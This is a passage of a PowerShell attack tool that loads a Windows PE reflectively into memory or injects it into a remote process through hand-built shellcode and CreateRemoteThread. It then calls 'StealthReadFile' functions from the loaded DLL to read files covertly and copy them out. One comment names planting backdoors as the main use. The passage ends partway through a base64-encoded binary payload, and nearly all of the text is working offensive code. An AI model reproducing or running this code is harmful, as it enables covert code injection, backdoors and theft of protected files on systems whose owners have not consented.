$Win32Constants\n\t\t}\n\t\t\n\t\t\n\t\t#Update the memory protection flags for all the memory just allocated\n\t\tif ($RemoteLoading -eq $false)\n\t\t{\n\t\t\tif ($NXCompatible -eq $true)\n\t\t\t{\n\t\t\t\tWrite-Verbose \"Update memory protection flags\"\n\t\t\t\tUpdate-MemoryProtectionFlags -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -Win32Types $Win32Types\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tWrite-Verbose \"PE being reflectively loaded is not compatible with NX memory, keeping memory as read write execute\"\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tWrite-Verbose \"PE being loaded in to a remote process, not adjusting memory permissions\"\n\t\t}\n\t\t\n\t\t\n\t\t#If remote loading, copy the DLL in to remote process memory\n\t\tif ($RemoteLoading -eq $true)\n\t\t{\n\t\t\t[UInt32]$NumBytesWritten = 0\n\t\t\t$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $EffectivePEHandle, $PEHandle, [UIntPtr]($PEInfo.SizeOfImage), [Ref]$NumBytesWritten)\n\t\t\tif ($Success -eq $false)\n\t\t\t{\n\t\t\t\tThrow \"Unable to write shellcode to remote process memory.\"\n\t\t\t}\n\t\t}\n\t\t\n\t\t\n\t\t#Call the entry point, if this is a DLL the entrypoint is the DllMain function, if it is an EXE it is the Main function\n\t\tif ($PEInfo.FileType -ieq \"DLL\")\n\t\t{\n\t\t\tif ($RemoteLoading -eq $false)\n\t\t\t{\n\t\t\t\tWrite-Verbose \"Calling dllmain so the DLL knows it has been loaded\"\n\t\t\t\t$DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n\t\t\t\t$DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])\n\t\t\t\t$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)\n\t\t\t\t\n\t\t\t\t$DllMain.Invoke($PEInfo.PEHandle, 1, [IntPtr]::Zero) | Out-Null\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$DllMainPtr = Add-SignedIntAsUnsigned ($EffectivePEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n\t\t\t\n\t\t\t\tif ($PEInfo.PE64Bit -eq $true)\n\t\t\t\t{\n\t\t\t\t\t#Shellcode: CallDllMain.asm\n\t\t\t\t\t$CallDllMainSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x66, 0x83, 0xe4, 0x00, 0x48, 0xb9)\n\t\t\t\t\t$CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xb8)\n\t\t\t\t\t$CallDllMainSC3 = @(0xff, 0xd0, 0x48, 0x89, 0xdc, 0x5b, 0xc3)\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t#Shellcode: CallDllMain.asm\n\t\t\t\t\t$CallDllMainSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xf0, 0xb9)\n\t\t\t\t\t$CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x50, 0x52, 0x51, 0xb8)\n\t\t\t\t\t$CallDllMainSC3 = @(0xff, 0xd0, 0x89, 0xdc, 0x5b, 0xc3)\n\t\t\t\t}\n\t\t\t\t$SCLength = $CallDllMainSC1.Length + $CallDllMainSC2.Length + $CallDllMainSC3.Length + ($PtrSize * 2)\n\t\t\t\t$SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)\n\t\t\t\t$SCPSMemOriginal = $SCPSMem\n\t\t\t\t\n\t\t\t\tWrite-BytesToMemory -Bytes $CallDllMainSC1 -MemoryAddress $SCPSMem\n\t\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC1.Length)\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($EffectivePEHandle, $SCPSMem, $false)\n\t\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t\t\tWrite-BytesToMemory -Bytes $CallDllMainSC2 -MemoryAddress $SCPSMem\n\t\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC2.Length)\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($DllMainPtr, $SCPSMem, $false)\n\t\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t\t\tWrite-BytesToMemory -Bytes $CallDllMainSC3 -MemoryAddress $SCPSMem\n\t\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC3.Length)\n\t\t\t\t\n\t\t\t\t$RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n\t\t\t\tif ($RSCAddr -eq [IntPtr]::Zero)\n\t\t\t\t{\n\t\t\t\t\tThrow \"Unable to allocate memory in the remote process for shellcode\"\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)\n\t\t\t\tif (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))\n\t\t\t\t{\n\t\t\t\t\tThrow \"Unable to write shellcode to remote process memory.\"\n\t\t\t\t}\n\n\t\t\t\t$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions\n\t\t\t\t$Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)\n\t\t\t\tif ($Result -ne 0)\n\t\t\t\t{\n\t\t\t\t\tThrow \"Call to CreateRemoteThread to call GetProcAddress failed.\"\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t\t}\n\t\t}\n\t\telseif ($PEInfo.FileType -ieq \"EXE\")\n\t\t{\n\t\t\t#Overwrite GetCommandLine and ExitProcess so we can provide our own arguments to the EXE and prevent it from killing the PS process\n\t\t\t[IntPtr]$ExeDoneBytePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1)\n\t\t\t[System.Runtime.InteropServices.Marshal]::WriteByte($ExeDoneBytePtr, 0, 0x00)\n\t\t\t$OverwrittenMemInfo = Update-ExeFunctions -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr\n\n\t\t\t#If this is an EXE, call the entry point in a new thread. We have overwritten the ExitProcess function to instead ExitThread\n\t\t\t#\tThis way the reflectively loaded EXE won't kill the powershell process when it exits, it will just kill its own thread.\n\t\t\t[IntPtr]$ExeMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n\t\t\tWrite-Verbose \"Call EXE Main function. Address: $ExeMainPtr. Creating thread for the EXE to run in.\"\n\n\t\t\t$Win32Functions.CreateThread.Invoke([IntPtr]::Zero, [IntPtr]::Zero, $ExeMainPtr, [IntPtr]::Zero, ([UInt32]0), [Ref]([UInt32]0)) | Out-Null\n\n\t\t\twhile($true)\n\t\t\t{\n\t\t\t\t[Byte]$ThreadDone = [System.Runtime.InteropServices.Marshal]::ReadByte($ExeDoneBytePtr, 0)\n\t\t\t\tif ($ThreadDone -eq 1)\n\t\t\t\t{\n\t\t\t\t\tCopy-ArrayOfMemAddresses -CopyInfo $OverwrittenMemInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants\n\t\t\t\t\tWrite-Verbose \"EXE thread has completed.\"\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tStart-Sleep -Seconds 1\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t\n\t\treturn @($PEInfo.PEHandle, $EffectivePEHandle)\n\t}\n\t\n\t\n\tFunction Invoke-MemoryFreeLibrary\n\t{\n\t\tParam(\n\t\t[Parameter(Position=0, Mandatory=$true)]\n\t\t[IntPtr]\n\t\t$PEHandle\n\t\t)\n\t\t\n\t\t#Get Win32 constants and functions\n\t\t$Win32Constants = Get-Win32Constants\n\t\t$Win32Functions = Get-Win32Functions\n\t\t$Win32Types = Get-Win32Types\n\t\t\n\t\t$PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\t\n\t\t#Call FreeLibrary for all the imports of the DLL\n\t\tif ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)\n\t\t{\n\t\t\t[IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)\n\t\t\t\n\t\t\twhile ($true)\n\t\t\t{\n\t\t\t\t$ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)\n\t\t\t\t\n\t\t\t\t#If the structure is null, it signals that this is the end of the array\n\t\t\t\tif ($ImportDescriptor.Characteristics -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.FirstThunk -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.ForwarderChain -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.Name -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.TimeDateStamp -eq 0)\n\t\t\t\t{\n\t\t\t\t\tWrite-Verbose \"Done unloading the libraries needed by the PE\"\n\t\t\t\t\tbreak\n\t\t\t\t}\n\n\t\t\t\t$ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi((Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name)))\n\t\t\t\t$ImportDllHandle = $Win32Functions.GetModuleHandle.Invoke($ImportDllPath)\n\n\t\t\t\tif ($ImportDllHandle -eq $null)\n\t\t\t\t{\n\t\t\t\t\tWrite-Warning \"Error getting DLL handle in MemoryFreeLibrary, DLLName: $ImportDllPath. Continuing anyways\" -WarningAction Continue\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle)\n\t\t\t\tif ($Success -eq $false)\n\t\t\t\t{\n\t\t\t\t\tWrite-Warning \"Unable to free library: $ImportDllPath. Continuing anyways.\" -WarningAction Continue\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))\n\t\t\t}\n\t\t}\n\t\t\n\t\t#Call DllMain with process detach\n\t\tWrite-Verbose \"Calling dllmain so the DLL knows it is being unloaded\"\n\t\t$DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n\t\t$DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])\n\t\t$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)\n\t\t\n\t\t$DllMain.Invoke($PEInfo.PEHandle, 0, [IntPtr]::Zero) | Out-Null\n\t\t\n\t\t\n\t\t$Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)\n\t\tif ($Success -eq $false)\n\t\t{\n\t\t\tWrite-Warning \"Unable to call VirtualFree on the PE's memory. Continuing anyways.\" -WarningAction Continue\n\t\t}\n\t}\n\n\n\tFunction Main\n\t{\n\t\t$Win32Functions = Get-Win32Functions\n\t\t$Win32Types = Get-Win32Types\n\t\t$Win32Constants =  Get-Win32Constants\n\t\t\n\t\t$RemoteProcHandle = [IntPtr]::Zero\n\t\t\n\t\t$ProcId = $null\n\t\t$ExeArgs = $null\n\t\t$ProcName = $null\n\n        #Determine whether or not to use 32bit or 64bit bytes\n        if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8)\n        {\n            [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes64)\n        }\n        else\n        {\n            [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes32)\n        }\n        $PEBytes[0] = 0\n        $PEBytes[1] = 0\n\t\t\n\t\t#If a remote process to inject in to is specified, get a handle to it\n\t\tif (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne \"\"))\n\t\t{\n\t\t\tThrow \"Can't supply a ProcId and ProcName, choose one or the other\"\n\t\t}\n\t\telseif ($ProcName -ne $null -and $ProcName -ne \"\")\n\t\t{\n\t\t\t$Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue)\n\t\t\tif ($Processes.Count -eq 0)\n\t\t\t{\n\t\t\t\tThrow \"Can't find process $ProcName\"\n\t\t\t}\n\t\t\telseif ($Processes.Count -gt 1)\n\t\t\t{\n\t\t\t\t$ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId\n\t\t\t\tWrite-Output $ProcInfo\n\t\t\t\tThrow \"More than one instance of $ProcName found, please specify the process ID to inject in to.\"\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$ProcId = $Processes[0].ID\n\t\t\t}\n\t\t}\n\t\t\n\t\t#Just realized that PowerShell launches with SeDebugPrivilege for some reason.. So this isn't needed. Keeping it around just incase it is needed in the future.\n\t\t#If the script isn't running in the same Windows logon session as the target, get SeDebugPrivilege\n#\t\tif ((Get-Process -Id $PID).SessionId -ne (Get-Process -Id $ProcId).SessionId)\n#\t\t{\n#\t\t\tWrite-Verbose \"Getting SeDebugPrivilege\"\n#\t\t\tEnable-SeDebugPrivilege -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants\n#\t\t}\t\n\t\t\n\t\tif (($ProcId -ne $null) -and ($ProcId -ne 0))\n\t\t{\n\t\t\t$RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId)\n\t\t\tif ($RemoteProcHandle -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Couldn't obtain the handle for process ID: $ProcId\"\n\t\t\t}\n\t\t\t\n\t\t\tWrite-Verbose \"Got the handle for the remote process to inject in to\"\n\t\t}\n\t\t\n\n\t\t#Load the PE reflectively\n\t\tWrite-Verbose \"Calling Invoke-MemoryLoadLibrary\"\n\t\t$PEHandle = [IntPtr]::Zero\n\t\tif ($RemoteProcHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\t$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs\n\t\t}\n\t\telse\n\t\t{\n\t\t\t$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle\n\t\t}\n\t\tif ($PELoadedInfo -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"Unable to load PE, handle returned is NULL\"\n\t\t}\n\t\t\n\t\t$PEHandle = $PELoadedInfo[0]\n\t\t$RemotePEHandle = $PELoadedInfo[1] #only matters if you loaded in to a remote process\n\t\t\n\t\t\n\t\t#Check if EXE or DLL. If EXE, the entry point was already called and we can now return. If DLL, call user function.\n\t\t$PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\tif (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -eq [IntPtr]::Zero))\n\t\t{\n\t\t\t#########################################\n\t\t\t### YOUR CODE GOES HERE\n\t\t\t#########################################\n\t\t\t\n            Write-Verbose \"Calling StealthReadFile in DLL\"\n\n            #Get some functions from the DLL\n\t\t    [IntPtr]$StealthReadFileAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"StealthReadFile\"\n\t\t    if ($StealthReadFileAddr -eq [IntPtr]::Zero)\n\t\t    {\n\t\t\t    Throw \"Couldn't find address of StealthReadFile.\"\n\t\t    }\n\t\t    $StealthReadFileDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UInt32], [UInt64], [UInt32].MakeByRefType(), [UInt64].MakeByRefType()) ([UInt32])\n\t\t\t$StealthReadFile = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StealthReadFileAddr, $StealthReadFileDelegate)\n\n\t\t\t[IntPtr]$StealthCloseFileAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"StealthCloseFile\"\n\t\t    if ($StealthCloseFileAddr -eq [IntPtr]::Zero)\n\t\t    {\n\t\t\t    Throw \"Couldn't find address of StealthCloseFile.\"\n\t\t    }\n\t\t    $StealthCloseFileDelegate = Get-DelegateType @([IntPtr]) ([Void])\n\t\t\t$StealthCloseFile = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StealthCloseFileAddr, $StealthCloseFileDelegate)\n\n\t\t\t[IntPtr]$StealthOpenFileAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"StealthOpenFile\"\n\t\t    if ($StealthOpenFileAddr -eq [IntPtr]::Zero)\n\t\t    {\n\t\t\t    Throw \"Couldn't find address of StealthOpenFile.\"\n\t\t    }\n\t\t\t\n\t\t    $StealthOpenFileDelegate = Get-DelegateType @([String]) ([IntPtr])\n\t\t\t$StealthOpenFile = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StealthOpenFileAddr, $StealthOpenFileDelegate)\n\n\t\t\t\n\t\t\tif ($RemoteDestination -imatch \"^\\s*$\")\n\t\t\t{\n\t\t\t\t$RemoteDestination = $null\n\t\t\t}\n\t\t\t\n\t\t\t#Open the file and get a stealth handle\n\t\t\t[IntPtr]$FileHandle = $StealthOpenFile.Invoke($Path)\n\t\t\tif ($FileHandle -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Couldn't get a handle for the file\"\n\t\t\t}\n\t\t\t\n            $StopLoop = $false\n\t\t\tdo\n\t\t\t{\n\t\t\t\t[IntPtr]$BufferPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($BufferSize)\n\t\t\t\t[UInt32]$BytesRead = 0\n\t\t\t\t[UInt64]$BytesLeft = 0\n\n\t\t\t    [UInt32]$RetVal = $StealthReadFile.Invoke($FileHandle, $BufferPtr, $BufferSize, $FileOffset, [Ref]$BytesRead, [Ref]$BytesLeft)\n\n\t\t\t\tif ($RetVal -ne 0)\n\t\t\t\t{\n\t\t\t\t\tWrite-Error \"Error reading file. Return code: $RetVal\" -ErrorAction Stop\n\t\t\t\t}\n\t\t\t\t#If there are still bytes of the file left, and a Path was not specified, throw an error.\n\t\t\t\t#\tThis means the user is attempting to stream back a file over PS remoting which is bigger than the max size they specified\n\t\t\t\tif ($RemoteDestination -eq $null)\n\t\t\t\t{\n\t\t\t\t\t$StopLoop = $true\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t[Byte[]]$ByteBuffer = New-Object Byte[] $BytesRead\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::Copy($BufferPtr, $ByteBuffer, 0, $BytesRead)\n                [System.Runtime.InteropServices.Marshal]::FreeHGlobal($BufferPtr)\n\t\t\t\t\n\t\t\t\tif ($RemoteDestination -ne $null)\n\t\t\t\t{\n\t\t\t\t\t$FileStream = New-Object System.IO.FileStream $RemoteDestination,([System.IO.FileMode]::Append)\n\t\t\t\t\t$FileStream.Seek(0, [System.IO.SeekOrigin]::End) | Out-Null\n\t\t\t\t\t$FileStream.Write($ByteBuffer, 0, $BytesRead) | Out-Null\n\t\t\t\t\t$FileStream.Flush() | Out-Null\n\t\t\t\t\t$FileStream.Dispose() | Out-Null\n\t\t\t\t\t$FileStream = $null\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t[UInt64]$FileOffset += $BytesRead\n\t\t\t\t\n\t\t\t\tWrite-Verbose \"Read $BytesRead bytes. $BytesLeft bytes remaining.\"\n\t\t\t} while (($BytesLeft -gt 0) -and ($StopLoop -eq $false))\n\n\t\t\t#Close the file\n\t\t\t$StealthCloseFile.Invoke($FileHandle) | Out-Null\n\n\n\t\t\t\n\t\t\t#########################################\n\t\t\t### END OF YOUR CODE\n\t\t\t#########################################\n\t\t}\n\t\t#For remote DLL injection, call a void function which takes no parameters\n\t\telseif (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -ne [IntPtr]::Zero))\n\t\t{\n\t\t\t$VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"VoidFunc\"\n\t\t\tif (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero))\n\t\t\t{\n\t\t\t\tThrow \"VoidFunc couldn't be found in the DLL\"\n\t\t\t}\n\t\t\t\n\t\t\t$VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle\n\t\t\t$VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle\n\t\t\t\n\t\t\t#Create the remote thread, don't wait for it to return.. This will probably mainly be used to plant backdoors\n\t\t\t$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions\n\t\t}\n\t\t\n\t\t#Don't free a library if it is injected in a remote process\n\t\tif ($RemoteProcHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tInvoke-MemoryFreeLibrary -PEHandle $PEHandle\n\t\t}\n\t\telse\n\t\t{\n\t\t\t#Just delete the memory allocated in PowerShell to build the PE before injecting to remote process\n\t\t\t$Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)\n\t\t\tif ($Success -eq $false)\n\t\t\t{\n\t\t\t\tWrite-Warning \"Unable to call VirtualFree on the PE's memory. Continuing anyways.\" -WarningAction Continue\n\t\t\t}\n\t\t}\n\t\t\n\t\tWrite-Verbose \"Done!\"\n\n        #More custom code\n        if ($RemoteDestination -eq $null)\n        {\n            $obj = New-Object PSObject\n            $obj | Add-Member -MemberType NoteProperty -Name Bytes -Value $ByteBuffer\n            $obj | Add-Member -MemberType NoteProperty -Name BytesLeft -Value $BytesLeft\n            $obj | Add-Member -MemberType NoteProperty -Name BytesRead -Value $BytesRead\n            return $obj\n        }\n        else\n        {\n            return $null\n        }\n\t}\n\n\tMain\n}\n\n#Main function to either run the script locally or remotely\nFunction Main\n{\n\tif (($PSCmdlet.MyInvocation.BoundParameters[\"Debug\"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters[\"Debug\"].IsPresent)\n\t{\n\t\t$DebugPreference  = \"Continue\"\n\t}\n\t\n\tWrite-Verbose \"PowerShell ProcessID: $PID\"\n\n\t[String]$PEBytes64 = \"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